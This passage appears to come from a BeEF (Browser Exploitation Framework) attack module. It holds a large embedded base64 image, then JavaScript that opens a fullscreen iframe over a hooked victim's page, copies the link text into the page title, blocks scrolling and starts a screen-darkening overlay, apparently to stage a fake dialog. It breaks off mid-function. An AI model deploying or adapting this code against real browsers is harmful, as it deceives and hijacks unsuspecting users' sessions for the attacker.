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'; var answer= ''; beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null); $j(document).attr('title', $j(this).html()); document.body.scroll = 'no'; document.documentElement.style.overflow = 'hidden'; // set up darkening function grayOut(vis, options) { // Pass true to gray out screen, false to ungray // options are optional. This is a JSON object with the following (optional) properties // opacity:0-100 // Lower number = less grayout higher = more of a blackout // zindex: # // HTML elements with a higher zindex appear on top of the gray out // bgcolor: (#xxxxxx) // Standard RGB Hex color code // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'}); // Because options is JSON opacity/zindex/bgcolor are all optional and can appear // in any order. Pass only the properties you need to set. var options = options || {}; var zindex = options.zindex || 50; var opacity = options.opacity || 70; var opaque = (opacity / 100); var bgcolor = options.bgcolor || '#000000'; var dark=document.getElementById('darkenScreenObject'); if (!dark) { // The dark layer doesn't exist, it's never been created. So we'll // create it here and apply some basic styles. // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917 var tbody = document.getElementsByTagName("body")[0]; var tnode = document.createElement('div'); // Create the layer. tnode.style.position='absolute'; // Position absolutely tnode.style.top='0px'; // In the top tnode.style.left='0px'; // Left corner of the page tnode.style.overflow='hidden'; // Try to avoid making scroll bars tnode.style.display='none'; // Start out Hidden tnode.id='darkenScreenObject'; // Name it so we can find it later tbody.appendChild(tnode); // Add it to the web page dark=document.getElementById('darkenScreenObject'); // Get the object. } if (vis) { // Calculate the page width and height if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { var pageWidth = document.body.scrollWidth+'px'; var pageHeight = document.body.scrollHeight+'px'; } else if( document.body.offsetWidth ) { var pageWidth = document.body.offsetWidth+'px'; var pageHeight = document.body.offsetHeight+'px'; } else { var pageWidth='100%'; var pageHeight='100%'; } //set the shader to cover the entire page and make it visible. dark.style.opacity=opaque; 